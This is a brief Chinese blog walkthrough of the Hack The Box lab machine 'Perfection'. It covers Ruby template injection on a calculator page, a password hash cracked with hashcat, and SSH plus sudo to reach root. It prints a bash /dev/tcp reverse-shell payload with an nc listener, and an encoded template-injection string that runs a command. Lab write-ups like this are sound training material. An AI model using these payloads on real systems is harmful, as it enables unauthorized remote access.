Hack The Box——Perfection笔记
机器名称:Perfection
难度:easy
首先使用nmap进行扫描可知开启了web服务和ssh服务
访问web网站,找到一个计算页面
并且通过信息收集可知,此网站为ruby语言开发,所以尝试ssti注入,发现存在ssti注入
我们将payload先进行编码
hURL -B "bash -i >& /dev/tcp/IP/7373 0>&1"
hURL -U "BASE64"
开启端口监听nc -lvnp 7373
然后将payload传入获取shell
(此处也可直接抓包输入执行命令进行后续操作,例如KK%0A<%25%3d+`ls`+%25>)
成功找到user.txt
通过信息收集可获得susan的hash值
并且找到了hash原文的组成部分
于是使用hashcat进行爆破得到密码
通过最初的扫描可知ssh服务开启,于是登陆ssh
使用sudo su,密码与上面密码相同,然后查看root.txt即可。
本文作者:juejuezi
本文链接:https://www.cnblogs.com/juejuezi/p/18127885
版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】博客园社区专享云产品让利特惠,阿里云新客6.5折上折
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步